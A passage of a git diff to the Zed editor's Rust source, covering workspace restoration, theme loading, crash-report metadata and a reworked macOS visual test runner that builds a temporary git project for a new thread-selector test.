cx.update(|cx| { + ( + WorkspaceSettings::get(None, cx).restore_on_startup, + 
workspace::WorkspaceDb::global(cx), + ) + }); let session_handle = app_state.session.clone(); let (last_session_id, last_session_window_stack) = cx.update(|cx| { @@ -1484,7 +1532,7 @@ pub(crate) async fn restorable_workspace_locations( match restore_behavior { workspace::RestoreOnStartupBehavior::LastWorkspace => { - workspace::last_opened_workspace_location(app_state.fs.as_ref()) + workspace::last_opened_workspace_location(&db, app_state.fs.as_ref()) .await .map(|(workspace_id, location, paths)| { vec![SessionWorkspace { @@ -1500,6 +1548,7 @@ pub(crate) async fn restorable_workspace_locations( let ordered = last_session_window_stack.is_some(); let mut locations = workspace::last_session_workspace_locations( + &db, &last_session_id, last_session_window_stack, app_state.fs.as_ref(), @@ -1542,8 +1591,14 @@ fn init_paths() -> HashMap> { }) } +pub(crate) static FORCE_CLI_MODE: LazyLock = LazyLock::new(|| { + let env_var = std::env::var(FORCE_CLI_MODE_ENV_VAR_NAME).ok().is_some(); + unsafe { std::env::remove_var(FORCE_CLI_MODE_ENV_VAR_NAME) }; + env_var +}); + fn stdout_is_a_pty() -> bool { - std::env::var(FORCE_CLI_MODE_ENV_VAR_NAME).ok().is_none() && io::stdout().is_terminal() + !*FORCE_CLI_MODE && io::stdout().is_terminal() } #[derive(Parser, Debug)] @@ -1584,6 +1639,13 @@ struct Args { #[arg(long, value_name = "USER@DISTRO")] wsl: Option, + /// Open the project in a dev container. + /// + /// Automatically triggers "Reopen in Dev Container" if a `.devcontainer/` + /// configuration is found in the project directory. + #[arg(long)] + dev_container: bool, + /// Instructs zed to run as a dev server on this machine. 
(not implemented) #[arg(long)] dev_server_token: Option, @@ -1732,8 +1794,24 @@ fn load_user_themes_in_background(fs: Arc, cx: &mut App) { })?; } } - theme_registry.load_user_themes(themes_dir, fs).await?; - cx.update(GlobalTheme::reload_theme); + + let mut theme_paths = fs + .read_dir(themes_dir) + .await + .with_context(|| format!("reading themes from {themes_dir:?}"))?; + + while let Some(theme_path) = theme_paths.next().await { + let Some(theme_path) = theme_path.log_err() else { + continue; + }; + let Some(bytes) = fs.load_bytes(&theme_path).await.log_err() else { + continue; + }; + + load_user_theme(&theme_registry, &bytes).log_err(); + } + + cx.update(theme_settings::reload_theme); anyhow::Ok(()) } }) @@ -1752,13 +1830,10 @@ fn watch_themes(fs: Arc, cx: &mut App) { for event in paths { if fs.metadata(&event.path).await.ok().flatten().is_some() { let theme_registry = cx.update(|cx| ThemeRegistry::global(cx)); - if theme_registry - .load_user_theme(&event.path, fs.clone()) - .await - .log_err() - .is_some() + if let Some(bytes) = fs.load_bytes(&event.path).await.log_err() + && load_user_theme(&theme_registry, &bytes).log_err().is_some() { - cx.update(GlobalTheme::reload_theme); + cx.update(theme_settings::reload_theme); } } } @@ -1772,7 +1847,7 @@ fn watch_languages(fs: Arc, languages: Arc, cx: &m use std::time::Duration; cx.background_spawn(async move { - let languages_src = Path::new("crates/languages/src"); + let languages_src = Path::new("crates/grammars/src"); let Some(languages_src) = fs.canonicalize(languages_src).await.log_err() else { return; }; @@ -1802,9 +1877,6 @@ fn watch_languages(fs: Arc, languages: Arc, cx: &m .detach(); } -#[cfg(not(debug_assertions))] -fn watch_languages(_fs: Arc, _languages: Arc, _cx: &mut App) {} - fn dump_all_gpui_actions() { #[derive(Debug, serde::Serialize)] struct ActionDef { diff --git a/crates/zed/src/reliability.rs b/crates/zed/src/reliability.rs index 
b291b9c8493db75e20282c8c9bc5a3750fb5e705..e6c3821507cffb0d6e46f9634a646a009b73ddc3 100644 --- a/crates/zed/src/reliability.rs +++ b/crates/zed/src/reliability.rs @@ -22,7 +22,11 @@ use crate::STARTUP_TIME; const MAX_HANG_TRACES: usize = 3; pub fn init(client: Arc, cx: &mut App) { - monitor_hangs(cx); + if cfg!(debug_assertions) { + log::info!("Debug assertions enabled, skipping hang monitoring"); + } else { + monitor_hangs(cx); + } cx.on_flags_ready({ let client = client.clone(); @@ -144,7 +148,7 @@ fn cleanup_old_hang_traces() { entry .path() .extension() - .is_some_and(|ext| ext == "miniprof") + .is_some_and(|ext| ext == "json" || ext == "miniprof") }) .collect(); @@ -175,7 +179,7 @@ fn save_hang_trace( .collect::>(); let trace_path = paths::hang_traces_dir().join(&format!( - "hang-{}.miniprof", + "hang-{}.miniprof.json", hang_time.format("%Y-%m-%d_%H-%M-%S") )); @@ -193,7 +197,7 @@ fn save_hang_trace( entry .path() .extension() - .is_some_and(|ext| ext == "miniprof") + .is_some_and(|ext| ext == "json" || ext == "miniprof") }) .collect(); @@ -288,16 +292,23 @@ async fn upload_minidump( form = form.text("minidump_error", minidump_error); } - if let Some(id) = client.telemetry().metrics_id() { - form = form.text("sentry[user][id]", id.to_string()); + if let Some(is_staff) = &metadata + .user_info + .as_ref() + .and_then(|user_info| user_info.is_staff) + { form = form.text( "sentry[user][is_staff]", - if client.telemetry().is_staff().unwrap_or_default() { - "true" - } else { - "false" - }, + if *is_staff { "true" } else { "false" }, ); + } + + if let Some(metrics_id) = metadata + .user_info + .as_ref() + .and_then(|user_info| user_info.metrics_id.as_ref()) + { + form = form.text("sentry[user][id]", metrics_id.clone()); } else if let Some(id) = client.telemetry().installation_id() { form = form.text("sentry[user][id]", format!("installation-{}", id)) } diff --git a/crates/zed/src/visual_test_runner.rs b/crates/zed/src/visual_test_runner.rs index 
0ae98d510aa34b05f7fa1766176f21ea353394d9..b59123a1a159487f802210f3916e16856daf8e61 100644 --- a/crates/zed/src/visual_test_runner.rs +++ b/crates/zed/src/visual_test_runner.rs @@ -42,6 +42,55 @@ fn main() { std::process::exit(1); } +#[cfg(target_os = "macos")] +fn main() { + // Set ZED_STATELESS early to prevent file system access to real config directories + // This must be done before any code accesses zed_env_vars::ZED_STATELESS + // SAFETY: We're at the start of main(), before any threads are spawned + unsafe { + std::env::set_var("ZED_STATELESS", "1"); + } + + env_logger::builder() + .filter_level(log::LevelFilter::Info) + .init(); + + let update_baseline = std::env::var("UPDATE_BASELINE").is_ok(); + + // Create a temporary directory for test files + // Canonicalize the path to resolve symlinks (on macOS, /var -> /private/var) + // which prevents "path does not exist" errors during worktree scanning + // Use keep() to prevent auto-cleanup - background worktree tasks may still be running + // when tests complete, so we let the OS clean up temp directories on process exit + let temp_dir = tempfile::tempdir().expect("Failed to create temp directory"); + let temp_path = temp_dir.keep(); + let canonical_temp = temp_path + .canonicalize() + .expect("Failed to canonicalize temp directory"); + let project_path = canonical_temp.join("project"); + std::fs::create_dir_all(&project_path).expect("Failed to create project directory"); + + // Create test files in the real filesystem + create_test_files(&project_path); + + let test_result = std::panic::catch_unwind(|| run_visual_tests(project_path, update_baseline)); + + // Note: We don't delete temp_path here because background worktree tasks may still + // be running. The directory will be cleaned up when the process exits or by the OS. 
+ + match test_result { + Ok(Ok(())) => {} + Ok(Err(e)) => { + eprintln!("Visual tests failed: {}", e); + std::process::exit(1); + } + Err(_) => { + eprintln!("Visual tests panicked"); + std::process::exit(1); + } + } +} + // All macOS-specific imports grouped together #[cfg(target_os = "macos")] use { @@ -50,18 +99,17 @@ use { agent_servers::{AgentServer, AgentServerDelegate}, anyhow::{Context as _, Result}, assets::Assets, - chrono::{Duration as ChronoDuration, Utc}, editor::display_map::DisplayRow, feature_flags::FeatureFlagAppExt as _, git_ui::project_diff::ProjectDiff, gpui::{ - App, AppContext as _, Bounds, KeyBinding, Modifiers, SharedString, VisualTestAppContext, + App, AppContext as _, Bounds, Entity, KeyBinding, Modifiers, VisualTestAppContext, WindowBounds, WindowHandle, WindowOptions, point, px, size, }, image::RgbaImage, + project::{AgentId, Project}, project_panel::ProjectPanel, - recent_projects::RecentProjectEntry, - settings::{NotifyWhenAgentWaiting, Settings as _}, + settings::{NotifyWhenAgentWaiting, PlaySoundWhenAgentDone, Settings as _}, settings_ui::SettingsWindow, std::{ any::Any, @@ -71,7 +119,7 @@ use { time::Duration, }, util::ResultExt as _, - workspace::{AppState, MultiWorkspace, Workspace, WorkspaceId}, + workspace::{AppState, MultiWorkspace, Workspace}, zed_actions::OpenSettingsAt, }; @@ -97,55 +145,6 @@ mod constants { #[cfg(target_os = "macos")] use constants::*; -#[cfg(target_os = "macos")] -fn main() { - // Set ZED_STATELESS early to prevent file system access to real config directories - // This must be done before any code accesses zed_env_vars::ZED_STATELESS - // SAFETY: We're at the start of main(), before any threads are spawned - unsafe { - std::env::set_var("ZED_STATELESS", "1"); - } - - env_logger::builder() - .filter_level(log::LevelFilter::Info) - .init(); - - let update_baseline = std::env::var("UPDATE_BASELINE").is_ok(); - - // Create a temporary directory for test files - // Canonicalize the path to resolve symlinks 
(on macOS, /var -> /private/var) - // which prevents "path does not exist" errors during worktree scanning - // Use keep() to prevent auto-cleanup - background worktree tasks may still be running - // when tests complete, so we let the OS clean up temp directories on process exit - let temp_dir = tempfile::tempdir().expect("Failed to create temp directory"); - let temp_path = temp_dir.keep(); - let canonical_temp = temp_path - .canonicalize() - .expect("Failed to canonicalize temp directory"); - let project_path = canonical_temp.join("project"); - std::fs::create_dir_all(&project_path).expect("Failed to create project directory"); - - // Create test files in the real filesystem - create_test_files(&project_path); - - let test_result = std::panic::catch_unwind(|| run_visual_tests(project_path, update_baseline)); - - // Note: We don't delete temp_path here because background worktree tasks may still - // be running. The directory will be cleaned up when the process exits or by the OS. - - match test_result { - Ok(Ok(())) => {} - Ok(Err(e)) => { - eprintln!("Visual tests failed: {}", e); - std::process::exit(1); - } - Err(_) => { - eprintln!("Visual tests panicked"); - std::process::exit(1); - } - } -} - #[cfg(target_os = "macos")] fn run_visual_tests(project_path: PathBuf, update_baseline: bool) -> Result<()> { // Create the visual test context with deterministic task scheduling @@ -171,13 +170,13 @@ fn run_visual_tests(project_path: PathBuf, update_baseline: bool) -> Result<()> // Set the global app state so settings_ui and other subsystems can find it cx.update(|cx| { - AppState::set_global(Arc::downgrade(&app_state), cx); + AppState::set_global(app_state.clone(), cx); }); // Initialize all Zed subsystems cx.update(|cx| { gpui_tokio::init(cx); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); client::init(&app_state.client, cx); audio::init(cx); workspace::init(app_state.clone(), cx); @@ -202,7 +201,12 @@ fn 
run_visual_tests(project_path: PathBuf, update_baseline: bool) -> Result<()> }); prompt_store::init(cx); let prompt_builder = prompt_store::PromptBuilder::load(app_state.fs.clone(), false, cx); - language_model::init(app_state.client.clone(), cx); + language_model::init(cx); + client::RefreshLlmTokenListener::register( + app_state.client.clone(), + app_state.user_store.clone(), + cx, + ); language_models::init(app_state.user_store.clone(), app_state.client.clone(), cx); git_ui::init(cx); project::AgentRegistryStore::init_global( @@ -212,9 +216,9 @@ fn run_visual_tests(project_path: PathBuf, update_baseline: bool) -> Result<()> ); agent_ui::init( app_state.fs.clone(), - app_state.client.clone(), prompt_builder, app_state.languages.clone(), + true, false, cx, ); @@ -232,7 +236,7 @@ fn run_visual_tests(project_path: PathBuf, update_baseline: bool) -> Result<()> agent_settings::AgentSettings::override_global( agent_settings::AgentSettings { notify_when_agent_waiting: NotifyWhenAgentWaiting::Never, - play_sound_when_agent_done: false, + play_sound_when_agent_done: PlaySoundWhenAgentDone::Never, ..agent_settings::AgentSettings::get_global(cx).clone() }, cx, @@ -548,6 +552,27 @@ fn run_visual_tests(project_path: PathBuf, update_baseline: bool) -> Result<()> } } + // Run Test 11: Thread target selector visual tests + #[cfg(feature = "visual-tests")] + { + println!("\n--- Test 11: start_thread_in_selector (6 variants) ---"); + match run_start_thread_in_selector_visual_tests(app_state.clone(), &mut cx, update_baseline) + { + Ok(TestResult::Passed) => { + println!("✓ start_thread_in_selector: PASSED"); + passed += 1; + } + Ok(TestResult::BaselineUpdated(_)) => { + println!("✓ start_thread_in_selector: Baselines updated"); + updated += 1; + } + Err(e) => { + eprintln!("✗ start_thread_in_selector: FAILED - {}", e); + failed += 1; + } + } + } + // Run Test 9: Tool Permissions Settings UI visual test println!("\n--- Test 9: tool_permissions_settings ---"); match 
run_tool_permissions_visual_tests(app_state.clone(), &mut cx, update_baseline) { @@ -945,7 +970,7 @@ fn init_app_state(cx: &mut App) -> Arc { let user_store = cx.new(|cx| client::UserStore::new(client.clone(), cx)); let workspace_store = cx.new(|cx| workspace::WorkspaceStore::new(client.clone(), cx)); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); client::init(&client, cx); let app_state = Arc::new(AppState { @@ -958,7 +983,7 @@ fn init_app_state(cx: &mut App) -> Arc { build_window_options: |_, _| Default::default(), session, }); - AppState::set_global(Arc::downgrade(&app_state), cx); + AppState::set_global(app_state.clone(), cx); app_state } @@ -1939,13 +1964,14 @@ impl AgentServer for StubAgentServer { ui::IconName::ZedAssistant } - fn name(&self) -> SharedString { + fn agent_id(&self) -> AgentId { "Visual Test Agent".into() } fn connect( &self, _delegate: AgentServerDelegate, + _project: Entity, _cx: &mut App, ) -> gpui::Task>> { gpui::Task::ready(Ok(Rc::new(self.connection.clone()))) @@ -2011,32 +2037,9 @@ fn run_agent_thread_view_test( // Create the necessary entities for the ReadFileTool let action_log = cx.update(|cx| cx.new(|_| action_log::ActionLog::new(project.clone()))); - let context_server_registry = cx.update(|cx| { - cx.new(|cx| agent::ContextServerRegistry::new(project.read(cx).context_server_store(), cx)) - }); - let fake_model = Arc::new(language_model::fake_provider::FakeLanguageModel::default()); - let project_context = cx.update(|cx| cx.new(|_| prompt_store::ProjectContext::default())); - - // Create the agent Thread - let thread = cx.update(|cx| { - cx.new(|cx| { - agent::Thread::new( - project.clone(), - project_context, - context_server_registry, - agent::Templates::new(), - Some(fake_model), - cx, - ) - }) - }); // Create the ReadFileTool - let tool = Arc::new(agent::ReadFileTool::new( - thread.downgrade(), - project.clone(), - action_log, - )); + let tool = 
Arc::new(agent::ReadFileTool::new(project.clone(), action_log, true)); // Create a test event stream to capture tool output let (event_stream, mut event_receiver) = agent::ToolCallEventStream::test(); @@ -2068,7 +2071,7 @@ fn run_agent_thread_view_test( let mut tool_content: Vec = Vec::new(); let mut tool_locations: Vec = Vec::new(); - while let Ok(Some(event)) = event_receiver.try_next() { + while let Ok(event) = event_receiver.try_recv() { if let Ok(agent::ThreadEvent::ToolCallUpdate(acp_thread::ToolCallUpdate::UpdateFields( update, ))) = event @@ -2135,16 +2138,10 @@ fn run_agent_thread_view_test( }) .context("Failed to get workspace handle")?; - let prompt_builder = - cx.update(|cx| prompt_store::PromptBuilder::load(app_state.fs.clone(), false, cx)); cx.background_executor.allow_parking(); let panel = cx .foreground_executor - .block_test(AgentPanel::load( - weak_workspace, - prompt_builder, - async_window_cx, - )) + .block_test(AgentPanel::load(weak_workspace, async_window_cx)) .context("Failed to load AgentPanel")?; cx.background_executor.forbid_parking(); @@ -2530,16 +2527,6 @@ fn run_multi_workspace_sidebar_visual_tests( std::fs::create_dir_all(&workspace1_dir)?; std::fs::create_dir_all(&workspace2_dir)?; - // Create directories for recent projects (they must exist on disk for display) - let recent1_dir = canonical_temp.join("tiny-project"); - let recent2_dir = canonical_temp.join("font-kit"); - let recent3_dir = canonical_temp.join("ideas"); - let recent4_dir = canonical_temp.join("tmp"); - std::fs::create_dir_all(&recent1_dir)?; - std::fs::create_dir_all(&recent2_dir)?; - std::fs::create_dir_all(&recent3_dir)?; - std::fs::create_dir_all(&recent4_dir)?; - // Enable the agent-v2 feature flag so multi-workspace is active cx.update(|cx| { cx.update_flags(true, vec!["agent-v2".to_string()]); @@ -2606,7 +2593,7 @@ fn run_multi_workspace_sidebar_visual_tests( }); cx.new(|cx| { let mut multi_workspace = MultiWorkspace::new(workspace1, window, cx); - 
multi_workspace.activate(workspace2, cx); + multi_workspace.activate(workspace2, window, cx); multi_workspace }) }, @@ -2619,7 +2606,7 @@ fn run_multi_workspace_sidebar_visual_tests( // Add worktree to workspace 1 (index 0) so it shows as "private-test-remote" let add_worktree1_task = multi_workspace_window .update(cx, |multi_workspace, _window, cx| { - let workspace1 = &multi_workspace.workspaces()[0]; + let workspace1 = multi_workspace.workspaces().next().unwrap(); let project = workspace1.read(cx).project().clone(); project.update(cx, |project, cx| { project.find_or_create_worktree(&workspace1_dir, true, cx) @@ -2638,7 +2625,7 @@ fn run_multi_workspace_sidebar_visual_tests( // Add worktree to workspace 2 (index 1) so it shows as "zed" let add_worktree2_task = multi_workspace_window .update(cx, |multi_workspace, _window, cx| { - let workspace2 = &multi_workspace.workspaces()[1]; + let workspace2 = multi_workspace.workspaces().nth(1).unwrap(); let project = workspace2.read(cx).project().clone(); project.update(cx, |project, cx| { project.find_or_create_worktree(&workspace2_dir, true, cx) @@ -2657,105 +2644,102 @@ fn run_multi_workspace_sidebar_visual_tests( // Switch to workspace 1 so it's highlighted as active (index 0) multi_workspace_window .update(cx, |multi_workspace, window, cx| { - multi_workspace.activate_index(0, window, cx); + let workspace = multi_workspace.workspaces().next().unwrap().clone(); + multi_workspace.activate(workspace, window, cx); }) .context("Failed to activate workspace 1")?; cx.run_until_parked(); - // Create the sidebar and register it on the MultiWorkspace - let sidebar = multi_workspace_window - .update(cx, |_multi_workspace, window, cx| { - let multi_workspace_handle = cx.entity(); + // Create the sidebar outside the MultiWorkspace update to avoid a + // re-entrant read panic (Sidebar::new reads the MultiWorkspace). 
+ let sidebar = cx + .update_window(multi_workspace_window.into(), |root_view, window, cx| { + let multi_workspace_handle: Entity = root_view.downcast().unwrap(); cx.new(|cx| sidebar::Sidebar::new(multi_workspace_handle, window, cx)) }) .context("Failed to create sidebar")?; multi_workspace_window - .update(cx, |multi_workspace, window, cx| { - multi_workspace.register_sidebar(sidebar.clone(), window, cx); + .update(cx, |multi_workspace, _window, cx| { + multi_workspace.register_sidebar(sidebar.clone(), cx); }) .context("Failed to register sidebar")?; cx.run_until_parked(); - // Inject recent project entries into the sidebar. - // We update the sidebar entity directly (not through the MultiWorkspace window update) - // to avoid a re-entrant read panic: rebuild_entries reads MultiWorkspace, so we can't - // be inside a MultiWorkspace update when that happens. - cx.update(|cx| { - sidebar.update(cx, |sidebar, cx| { - let now = Utc::now(); - let today_timestamp = now; - let yesterday_timestamp = now - ChronoDuration::days(1); - let past_week_timestamp = now - ChronoDuration::days(10); - let all_timestamp = now - ChronoDuration::days(60); - - let recent_projects = vec![ - RecentProjectEntry { - name: "tiny-project".into(), - full_path: recent1_dir.to_string_lossy().to_string().into(), - paths: vec![recent1_dir.clone()], - workspace_id: WorkspaceId::default(), - timestamp: today_timestamp, - }, - RecentProjectEntry { - name: "font-kit".into(), - full_path: recent2_dir.to_string_lossy().to_string().into(), - paths: vec![recent2_dir.clone()], - workspace_id: WorkspaceId::default(), - timestamp: yesterday_timestamp, - }, - RecentProjectEntry { - name: "ideas".into(), - full_path: recent3_dir.to_string_lossy().to_string().into(), - paths: vec![recent3_dir.clone()], - workspace_id: WorkspaceId::default(), - timestamp: past_week_timestamp, - }, - RecentProjectEntry { - name: "tmp".into(), - full_path: recent4_dir.to_string_lossy().to_string().into(), - paths: 
vec![recent4_dir.clone()], - workspace_id: WorkspaceId::default(), - timestamp: all_timestamp, - }, - ]; - sidebar.set_test_recent_projects(recent_projects, cx); - }); - }); - - // Set thread info directly on the sidebar for visual testing - cx.update(|cx| { - sidebar.update(cx, |sidebar, _cx| { - sidebar.set_test_thread_info( - 0, - "Refine thread view scrolling behavior".into(), - ui::AgentThreadStatus::Completed, - ); - sidebar.set_test_thread_info( - 1, - "Add line numbers option to FileEditBlock".into(), - ui::AgentThreadStatus::Running, - ); - }); - }); + // Save test threads to the ThreadStore for each workspace + let save_tasks = multi_workspace_window + .update(cx, |multi_workspace, _window, cx| { + let thread_store = agent::ThreadStore::global(cx); + let workspaces: Vec<_> = multi_workspace.workspaces().cloned().collect(); + let mut tasks = Vec::new(); + + for (index, workspace) in workspaces.iter().enumerate() { + let workspace_ref = workspace.read(cx); + let mut paths = Vec::new(); + for worktree in workspace_ref.worktrees(cx) { + let worktree_ref = worktree.read(cx); + if worktree_ref.is_visible() { + paths.push(worktree_ref.abs_path().to_path_buf()); + } + } + let path_list = util::path_list::PathList::new(&paths); + + let (session_id, title, updated_at) = match index { + 0 => ( + "visual-test-thread-0", + "Refine thread view scrolling behavior", + chrono::TimeZone::with_ymd_and_hms(&chrono::Utc, 2024, 6, 15, 10, 30, 0) + .unwrap(), + ), + 1 => ( + "visual-test-thread-1", + "Add line numbers option to FileEditBlock", + chrono::TimeZone::with_ymd_and_hms(&chrono::Utc, 2024, 6, 15, 11, 0, 0) + .unwrap(), + ), + _ => continue, + }; + + let task = thread_store.update(cx, |store, cx| { + store.save_thread( + acp::SessionId::new(Arc::from(session_id)), + agent::DbThread { + title: title.to_string().into(), + messages: Vec::new(), + updated_at, + detailed_summary: None, + initial_project_snapshot: None, + cumulative_token_usage: Default::default(), + 
request_token_usage: Default::default(), + model: None, + profile: None, + imported: false, + subagent_context: None, + speed: None, + thinking_enabled: false, + thinking_effort: None, + ui_scroll_position: None, + draft_prompt: None, + }, + path_list, + cx, + ) + }); + tasks.push(task); + } + tasks + }) + .context("Failed to create test threads")?; - // Set last-worked-on thread titles on some recent projects for visual testing - cx.update(|cx| { - sidebar.update(cx, |sidebar, cx| { - sidebar.set_test_recent_project_thread_title( - recent1_dir.to_string_lossy().to_string().into(), - "Fix flaky test in CI pipeline".into(), - cx, - ); - sidebar.set_test_recent_project_thread_title( - recent2_dir.to_string_lossy().to_string().into(), - "Upgrade font rendering engine".into(), - cx, - ); - }); - }); + cx.background_executor.allow_parking(); + for task in save_tasks { + cx.foreground_executor + .block_test(task) + .context("Failed to save test thread")?; + } + cx.background_executor.forbid_parking(); cx.run_until_parked(); @@ -2911,12 +2895,12 @@ impl gpui::Render for ThreadItemIconDecorationsTestView { container() .child(ThreadItem::new("ti-none", "Default idle thread").timestamp("1:00 AM")), ) - .child(section_label("Blue dot (generation done)")) + .child(section_label("Blue dot (notified)")) .child( container().child( ThreadItem::new("ti-done", "Generation completed successfully") .timestamp("1:05 AM") - .generation_done(true), + .notified(true), ), ) .child(section_label("Yellow triangle (waiting for confirmation)")) @@ -2941,18 +2925,17 @@ impl gpui::Render for ThreadItemIconDecorationsTestView { ThreadItem::new("ti-running", "Generating response...") .icon(IconName::AiClaude) .timestamp("1:20 AM") - .running(true), + .status(ui::AgentThreadStatus::Running), ), ) .child(section_label( - "Spinner + yellow triangle (running + waiting)", + "Spinner + yellow triangle (waiting for confirmation)", )) .child( container().child( ThreadItem::new("ti-running-waiting", 
"Running but needs confirmation") .icon(IconName::AiClaude) .timestamp("1:25 AM") - .running(true) .status(ui::AgentThreadStatus::WaitingForConfirmation), ), ) @@ -3066,3 +3049,614 @@ fn run_error_wrapping_visual_tests( Ok(test_result) } + +#[cfg(all(target_os = "macos", feature = "visual-tests"))] +/// Runs a git command in the given directory and returns an error with +/// stderr/stdout context if the command fails (non-zero exit status). +fn run_git_command(args: &[&str], dir: &std::path::Path) -> Result<()> { + let output = std::process::Command::new("git") + .args(args) + .current_dir(dir) + .output() + .with_context(|| format!("failed to spawn `git {}`", args.join(" ")))?; + + if !output.status.success() { + let stdout = String::from_utf8_lossy(&output.stdout); + let stderr = String::from_utf8_lossy(&output.stderr); + anyhow::bail!( + "`git {}` failed (exit {})\nstdout: {}\nstderr: {}", + args.join(" "), + output.status, + stdout.trim(), + stderr.trim(), + ); + } + Ok(()) +} + +#[cfg(all(target_os = "macos", feature = "visual-tests"))] +fn run_start_thread_in_selector_visual_tests( + app_state: Arc, + cx: &mut VisualTestAppContext, + update_baseline: bool, +) -> Result { + use agent_ui::{AgentPanel, StartThreadIn, WorktreeCreationStatus}; + + // Enable feature flags so the thread target selector renders + cx.update(|cx| { + cx.update_flags(true, vec!["agent-v2".to_string()]); + }); + + // Create a temp directory with a real git repo so "New Worktree" is enabled + let temp_dir = tempfile::tempdir()?; + let temp_path = temp_dir.keep(); + let canonical_temp = temp_path.canonicalize()?; + let project_path = canonical_temp.join("project"); + std::fs::create_dir_all(&project_path)?; + + // Initialize git repo + run_git_command(&["init"], &project_path)?; + run_git_command(&["config", "user.email", "test@test.com"], &project_path)?; + run_git_command(&["config", "user.name", "Test User"], &project_path)?; + + // Create source files + let src_dir = 
project_path.join("src"); + std::fs::create_dir_all(&src_dir)?; + std::fs::write( + src_dir.join("main.rs"), + r#"fn main() { + println!("Hello, world!"); + + let x = 42; + let y = x * 2; + + if y > 50 { + println!("y is greater than 50"); + } else { + println!("y is not greater than 50"); + } + + for i in 0..10 { + println!("i = {}", i); + } +} + +fn helper_function(a: i32, b: i32) -> i32 { + a + b +} +"#, + )?; + + std::fs::write( + project_path.join("Cargo.toml"), + r#"[package] +name = "test_project" +version = "0.1.0" +edition = "2021" +"#, + )?; + + // Commit so git status is clean + run_git_command(&["add", "."], &project_path)?; + run_git_command(&["commit", "-m", "Initial commit"], &project_path)?; + + let project = cx.update(|cx| { + project::Project::local( + app_state.client.clone(), + app_state.node_runtime.clone(), + app_state.user_store.clone(), + app_state.languages.clone(), + app_state.fs.clone(), + None, + project::LocalProjectFlags { + init_worktree_trust: false, + ..Default::default() + }, + cx, + ) + }); + + // Use a wide window so we see project panel + editor + agent panel + let window_size = size(px(1280.0), px(800.0)); + let bounds = Bounds { + origin: point(px(0.0), px(0.0)), + size: window_size, + }; + + let workspace_window: WindowHandle = cx + .update(|cx| { + cx.open_window( + WindowOptions { + window_bounds: Some(WindowBounds::Windowed(bounds)), + focus: false, + show: false, + ..Default::default() + }, + |window, cx| { + let workspace = cx.new(|cx| { + Workspace::new(None, project.clone(), app_state.clone(), window, cx) + }); + cx.new(|cx| MultiWorkspace::new(workspace, window, cx)) + }, + ) + }) + .context("Failed to open thread target selector test window")?; + + cx.run_until_parked(); + + // Create the sidebar outside the MultiWorkspace update to avoid a + // re-entrant read panic (Sidebar::new reads the MultiWorkspace). 
+ let sidebar = cx + .update_window(workspace_window.into(), |root_view, window, cx| { + let multi_workspace_handle: Entity = root_view.downcast().unwrap(); + cx.new(|cx| sidebar::Sidebar::new(multi_workspace_handle, window, cx)) + }) + .context("Failed to create sidebar")?; + + workspace_window + .update(cx, |multi_workspace, _window, cx| { + multi_workspace.register_sidebar(sidebar.clone(), cx); + }) + .context("Failed to register sidebar")?; + + // Open the sidebar + workspace_window + .update(cx, |multi_workspace, window, cx| { + multi_workspace.toggle_sidebar(window, cx); + }) + .context("Failed to toggle sidebar")?; + + cx.run_until_parked(); + + // Add the git project as a worktree + let add_worktree_task = workspace_window + .update(cx, |multi_workspace, _window, cx| { + let workspace = multi_workspace.workspaces().next().unwrap(); + let project = workspace.read(cx).project().clone(); + project.update(cx, |project, cx| { + project.find_or_create_worktree(&project_path, true, cx) + }) + }) + .context("Failed to start adding worktree")?; + + cx.background_executor.allow_parking(); + cx.foreground_executor + .block_test(add_worktree_task) + .context("Failed to add worktree")?; + cx.background_executor.forbid_parking(); + + cx.run_until_parked(); + + // Wait for worktree scan and git status + for _ in 0..5 { + cx.advance_clock(Duration::from_millis(100)); + cx.run_until_parked(); + } + + // Open the project panel + let (weak_workspace, async_window_cx) = workspace_window + .update(cx, |multi_workspace, window, cx| { + let workspace = multi_workspace.workspaces().next().unwrap(); + (workspace.read(cx).weak_handle(), window.to_async(cx)) + }) + .context("Failed to get workspace handle")?; + + cx.background_executor.allow_parking(); + let project_panel = cx + .foreground_executor + .block_test(ProjectPanel::load(weak_workspace, async_window_cx)) + .context("Failed to load project panel")?; + cx.background_executor.forbid_parking(); + + workspace_window + 
.update(cx, |multi_workspace, window, cx| { + let workspace = multi_workspace.workspaces().next().unwrap(); + workspace.update(cx, |workspace, cx| { + workspace.add_panel(project_panel, window, cx); + workspace.open_panel::(window, cx); + }); + }) + .context("Failed to add project panel")?; + + cx.run_until_parked(); + + // Open main.rs in the editor + let open_file_task = workspace_window + .update(cx, |multi_workspace, window, cx| { + let workspace = multi_workspace.workspaces().next().unwrap(); + workspace.update(cx, |workspace, cx| { + let worktree = workspace.project().read(cx).worktrees(cx).next(); + if let Some(worktree) = worktree { + let worktree_id = worktree.read(cx).id(); + let rel_path: std::sync::Arc = + util::rel_path::rel_path("src/main.rs").into(); + let project_path: project::ProjectPath = (worktree_id, rel_path).into(); + Some(workspace.open_path(project_path, None, true, window, cx)) + } else { + None + } + }) + }) + .log_err() + .flatten(); + + if let Some(task) = open_file_task { + cx.background_executor.allow_parking(); + cx.foreground_executor.block_test(task).log_err(); + cx.background_executor.forbid_parking(); + } + + cx.run_until_parked(); + + // Load the AgentPanel + let (weak_workspace, async_window_cx) = workspace_window + .update(cx, |multi_workspace, window, cx| { + let workspace = multi_workspace.workspaces().next().unwrap(); + (workspace.read(cx).weak_handle(), window.to_async(cx)) + }) + .context("Failed to get workspace handle for agent panel")?; + + // Register an observer so that workspaces created by the worktree creation + // flow get AgentPanel and ProjectPanel loaded automatically. Without this, + // `workspace.panel::(cx)` returns None in the new workspace and + // the creation flow's `focus_panel::` call is a no-op. 
